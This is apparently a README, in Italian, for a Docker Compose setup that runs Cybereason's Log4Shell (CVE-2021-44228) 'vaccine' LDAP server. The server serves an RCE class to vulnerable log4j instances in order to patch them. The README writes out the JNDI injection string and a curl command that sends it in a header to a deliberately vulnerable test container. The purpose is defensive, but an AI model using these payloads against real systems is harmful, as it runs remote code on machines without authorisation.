
soluzione docker compose per eseguire un ambiente vaccinale per la vulnerabilità log4j2 CVE-2021-44228
Un modo containerizzato per eseguire il vaccino log4j offerto da Cyberreason
Clona questo repository:
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git
Modifica il file containers.env per inserire un IP/DNS privato o pubblico corretto a cui il tuo target possa accedere. La voce predefinita probabilmente non funzionerà per te!
Costruisci ed esegui i container:
docker-compose -f docker-compose.yml -p vaccine up
Ora hai un server ldap in ascolto che servirà la classe Log4jRCE per inoculare un'istanza vulnerabile di log4j.
Puoi esporre questo servizio su internet (se vuoi) utilizzando ngrok.
ngrok tcp 1389
Puoi inviare a questo server un'istanza vulnerabile di log4j utilizzando la famigerata stringa di input jndi:
${jndi:ldap://<ngrokurlgoeshere>:1389/a}
Esiste una versione volutamente vulnerabile di log4j in un container disponibile all'indirizzo:
Puoi seguire le loro istruzioni per avviarlo e usarlo per i test:
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
E attiva l'inoculazione tramite:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'